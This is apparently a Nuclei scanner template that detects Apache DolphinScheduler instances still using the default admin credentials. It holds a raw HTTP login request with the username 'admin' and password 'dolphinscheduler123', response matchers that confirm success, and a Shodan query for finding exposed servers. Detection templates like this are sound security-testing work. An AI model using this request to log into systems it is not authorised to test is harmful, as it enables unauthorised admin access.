id: dolphinscheduler-default-login

info:
  name: Apache DolphinScheduler Default Login
  author: For3stCo1d
  severity: high
  description: Apache DolphinScheduler default admin credentials were discovered.
  reference:
    - https://github.com/apache/dolphinscheduler
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
    shodan-query: http.title:"DolphinScheduler"
  tags: apache,dolphinscheduler,default-login,oss

http:
  - raw:
      - |
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName={{user}}&userPassword={{pass}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - dolphinscheduler123

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"msg":"login success"'
          - '"sessionId":'
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/03/28
